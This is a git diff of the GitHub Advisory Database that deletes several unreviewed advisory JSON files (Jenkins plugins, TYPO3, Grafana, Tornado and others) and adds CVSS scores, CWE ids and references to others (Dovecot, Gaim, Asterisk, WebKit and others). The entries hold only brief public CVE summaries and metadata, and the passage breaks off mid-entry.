3e87ce34ef724..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7w6p-rwhg-7h3g", - "modified": "2022-05-24T17:07:02Z", - "published": "2022-05-24T17:07:02Z", - "aliases": [ - "CVE-2020-6638" - ], - "details": "Grin through 2.1.1 has Insufficient Validation.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6638" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-6638.md" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin/compare/v2.1.1...v3.0.0" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-01-21T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json b/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json index 81ec98ac61b87..b9f8eb7acea7f 100644 --- a/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json +++ b/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json @@ -33,10 +33,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json b/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json deleted file mode 100644 index 5a7640b426051..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8864-pwhg-3mp2", - "modified": "2022-05-14T03:05:26Z", - "published": "2022-05-14T03:05:26Z", - "aliases": [ - "CVE-2018-1000607" - ], - "details": "A arbitrary file write vulnerability exists in Jenkins Fortify CloudScan Plugin 1.5.1 and earlier in ArchiveUtil.java that allows attackers able to control rulepack zip file contents to overwrite any file on the Jenkins master file system, only limited by the permissions of the user the Jenkins master process is running as.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000607" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-06-25/#SECURITY-870" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-20" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-26T17:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json b/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json index fab4daea5d31b..5203dbe0a88d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json +++ b/advisories/unreviewed/2022/05/GHSA-89r5-2fhc-hwj7/GHSA-89r5-2fhc-hwj7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-89r5-2fhc-hwj7", - "modified": "2022-05-02T03:49:44Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-02T03:49:44Z", "aliases": [ "CVE-2009-3897" ], "details": "Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -69,7 +72,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json b/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json deleted file mode 100644 index ceae3147bc462..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8jx9-7j5m-79x4", - "modified": "2022-05-13T01:40:54Z", - "published": "2022-05-13T01:40:54Z", - "aliases": [ - "CVE-2017-1000089" - ], - "details": "Builds in Jenkins are associated with an authentication that controls the permissions that the build has to interact with other elements in Jenkins. The Pipeline: Build Step Plugin did not check the build authentication it was running as and allowed triggering any other project in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000089" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json b/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json index f1bee7f702270..9f28f347aaea3 100644 --- a/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json +++ b/advisories/unreviewed/2022/05/GHSA-8p42-r5f7-3m7g/GHSA-8p42-r5f7-3m7g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8p42-r5f7-3m7g", - "modified": "2022-05-01T02:04:59Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-01T02:04:59Z", "aliases": [ "CVE-2005-2103" ], "details": "Buffer overflow in the AIM and ICQ module in Gaim before 1.5.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an away message with a large number of AIM substitution strings, such as %t or %n.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,7 +56,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json b/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json deleted file mode 100644 index cf788b674ef2b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8rc4-3jc3-83pm", - "modified": "2022-05-14T03:13:12Z", - "published": "2022-05-14T03:13:12Z", - "aliases": [ - "CVE-2018-1000198" - ], - "details": "A XML external entity processing vulnerability exists in Jenkins Black Duck Hub Plugin 3.1.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read permission to make Jenkins process XML eternal entities in an XML document.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000198" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-671" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json b/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json deleted file mode 100644 index 435b39f740891..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8vpw-mgpf-mpvv", - "modified": "2022-05-17T19:57:19Z", - "published": "2022-05-17T19:57:19Z", - "aliases": [ - "CVE-2014-9720" - ], - "details": "Tornado before 3.2.2 sends arbitrary responses that contain a fixed CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720" - }, - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308" - }, - { - "type": "WEB", - "url": "https://bugzilla.novell.com/show_bug.cgi?id=930362" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816" - }, - { - "type": "WEB", - "url": "http://openwall.com/lists/oss-security/2015/05/19/4" - }, - { - "type": "WEB", - "url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-01-24T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json b/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json index 0c771cf21c130..a52abc8c418b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json +++ b/advisories/unreviewed/2022/05/GHSA-8vrj-v84v-pmgx/GHSA-8vrj-v84v-pmgx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8vrj-v84v-pmgx", - "modified": "2022-05-02T03:45:33Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-02T03:45:33Z", "aliases": [ "CVE-2009-3489" ], "details": "Adobe Photoshop Elements 8.0 installs the Adobe Active File Monitor V8 service with an insecure security descriptor, which allows local users to (1) stop the service via the stop command, (2) execute arbitrary commands as SYSTEM by using the config command to modify the binPath variable, or (3) restart the service via the start command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json b/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json deleted file mode 100644 index 9ce1c0661ae2f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-92cv-wv2c-8899", - "modified": "2022-05-17T05:50:42Z", - "published": "2022-05-17T05:50:42Z", - "aliases": [ - "CVE-2010-2086" - ], - "details": "Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2086" - }, - { - "type": "WEB", - "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt" - }, - { - "type": "WEB", - "url": "http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-05-27T19:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json b/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json deleted file mode 100644 index d25a3d0a99fc0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-966m-m549-2878", - "modified": "2022-05-13T01:13:08Z", - "published": "2022-05-13T01:13:08Z", - "aliases": [ - "CVE-2010-1616" - ], - "details": "Moodle 1.8.x and 1.9.x before 1.9.8 can create new roles when restoring a course, which allows teachers to create new accounts even if they do not have the moodle/user:create capability.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1616" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" - }, - { - "type": "WEB", - "url": "http://moodle.org/security/" - }, - { - "type": "WEB", - "url": "http://tracker.moodle.org/browse/MDL-16658" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1107" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-04-29T21:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json b/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json index 0f1d4330e9949..b938b0dc194ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json +++ b/advisories/unreviewed/2022/05/GHSA-96r9-hr2x-h9g7/GHSA-96r9-hr2x-h9g7.json @@ -40,7 +40,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-200" + "CWE-200", + "CWE-697" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json b/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json deleted file mode 100644 index 481d84ddfd39d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9c2p-99pg-c4j9", - "modified": "2022-05-17T00:29:01Z", - "published": "2022-05-17T00:29:01Z", - "aliases": [ - "CVE-2017-1000102" - ], - "details": "The Details view of some Static Analysis Utilities based plugins, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to these plugins, for example the console output which is parsed to extract build warnings (Warnings Plugin), could insert arbitrary HTML into this view.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000102" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/101061" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json b/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json index 88bfeedff05fa..06b5827514d9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json +++ b/advisories/unreviewed/2022/05/GHSA-9g7f-gmj5-mxvq/GHSA-9g7f-gmj5-mxvq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9g7f-gmj5-mxvq", - "modified": "2022-05-17T00:42:56Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-17T00:42:56Z", "aliases": [ "CVE-2008-5784" ], "details": "V3 Chat - Profiles/Dating Script 3.0.2 allows remote attackers to bypass authentication and gain administrative access by setting the admin cookie to 1.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-287" + "CWE-287", + "CWE-565" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json b/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json deleted file mode 100644 index b3f6538862c27..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9hh2-8cw6-hfv7", - "modified": "2022-05-17T01:55:58Z", - "published": "2022-05-17T01:55:58Z", - "aliases": [ - "CVE-2010-5100" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5100" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64181" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/35770" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/70120" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45470" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-05-21T20:55:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json b/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json deleted file mode 100644 index 5cbd9ff9bd7b3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9hv8-4frf-cprf", - "modified": "2022-05-24T17:18:56Z", - "published": "2022-05-24T17:18:56Z", - "aliases": [ - "CVE-2018-18624" - ], - "details": "Grafana 5.3.1 has XSS via a column style on the \"Dashboard > Table Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18624" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/pull/11813" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-06-02T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json b/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json deleted file mode 100644 index 29511ccf21fd4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9hw3-4gvp-8mv5", - "modified": "2022-05-17T01:55:59Z", - "published": "2022-05-17T01:55:59Z", - "aliases": [ - "CVE-2010-5097" - ], - "details": "Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5097" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64178" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/35770" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/70123" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45470" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-05-21T20:55:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json b/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json index 8bc956c0d611c..cc893ebb96eeb 100644 --- a/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json +++ b/advisories/unreviewed/2022/05/GHSA-9j34-5qgm-c4jh/GHSA-9j34-5qgm-c4jh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9j34-5qgm-c4jh", - "modified": "2022-05-13T01:24:52Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-13T01:24:52Z", "aliases": [ "CVE-2010-4577" ], "details": "The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in WebKit, as used in Google Chrome before 8.0.552.224, Chrome OS before 8.0.552.343, webkitgtk before 1.2.6, and other products does not properly parse Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted local font, related to \"Type Confusion.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json b/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json index 422c99d048e4f..fe2069c476f7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json +++ b/advisories/unreviewed/2022/05/GHSA-9jqm-gvwx-9wxq/GHSA-9jqm-gvwx-9wxq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9jqm-gvwx-9wxq", - "modified": "2022-05-01T18:20:17Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T18:20:17Z", "aliases": [ "CVE-2007-4103" ], "details": "The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -65,7 +68,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-772" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json b/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json deleted file mode 100644 index 330bc80677404..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9jrh-hch8-rr5c", - "modified": "2022-05-14T03:23:41Z", - "published": "2022-05-14T03:23:41Z", - "aliases": [ - "CVE-2018-1000148" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins Copy To Slave Plugin version 1.4.4 and older in CopyToSlaveBuildWrapper.java that allows attackers with permission to configure jobs to read arbitrary files from the Jenkins master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000148" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-545" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-04-05T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json b/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json index ee50560777da7..4add7b8fc8dee 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json +++ b/advisories/unreviewed/2022/05/GHSA-9q64-vqcr-hw99/GHSA-9q64-vqcr-hw99.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9q64-vqcr-hw99", - "modified": "2022-05-01T18:11:57Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:11:57Z", "aliases": [ "CVE-2007-3268" ], "details": "The TFTP implementation in IBM Tivoli Provisioning Manager for OS Deployment 5.1 before Fix Pack 3 allows remote attackers to cause a denial of service (rembo.exe crash and multiple service outage) via a read (RRQ) request with an invalid blksize (blocksize), which triggers a divide-by-zero error.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -53,7 +56,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-369" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json b/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json index 48c6c92db2ef5..11ef125391c07 100644 --- a/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json +++ b/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9r2w-p922-mx3m", 